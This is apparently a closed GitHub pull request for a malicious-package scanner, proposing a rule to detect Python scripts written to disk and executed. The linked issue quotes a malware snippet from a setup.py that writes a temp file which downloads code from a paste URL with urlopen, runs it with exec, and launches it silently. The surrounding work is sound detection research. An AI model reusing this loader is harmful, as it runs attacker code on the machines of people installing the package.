### PR TITLE
add disk script

### LINKED ISSUE #205: New heuristic to identify Python script written to disk and executed
For instance:

```python
_ttmp = _ffile(delete=False)
_ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen('https://paste.bingner.com/paste/dsvc4/raw').read())""")
_ttmp.close() 
try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}")
except: pass
setup(
```

We might want to also take into account running `python XX.py` after downloading

### PR DESCRIPTION
**Pull request by jxdv**
Closes #205.

### CODE REVIEW

**Comment by jxdv** [comment]
Hi @christophetd, My GitHub account got suspended just few minutes after submitting this PR xD I think the automatic system got confused and thought that I might be writing the malicious code myself or whatever. Is there any change this and my other PRs will get reviewed in the near future?

File: guarddog/analyzer/sourcecode/code-execution.yml [hunk 1]
```diff
@@ -77,6 +77,7 @@ rules:
           # miscellaneous
           - pattern: os.system($ARG1, ...)
           - pattern: system($ARG1, ...)
+          - pattern: _ssystem($ARG1, ...)
```
Comment (christophetd) [inline guarddog/analyzer/sourcecode/code-execution.yml:80]: This doesn't look like a standard Python function

**Review by christophetd — CHANGES_REQUESTED** [review]
The original spirit of https://github.com/DataDog/guarddog/issues/205 was to detect a new behavior, namely when a Python script was written to disk and executed. I think this PR tries to match on a specific function name, which is quite different, so if you don't mind I think we can close this one

**Comment by jxdv** [comment]
> The original spirit of #205 was to detect a new behavior, namely when a Python script was written to disk and executed. I think this PR tries to match on a specific function name, which is quite different, so if you don't mind I think we can close this one

Yes, I misunderstood that issue

**Pull request closed without merging**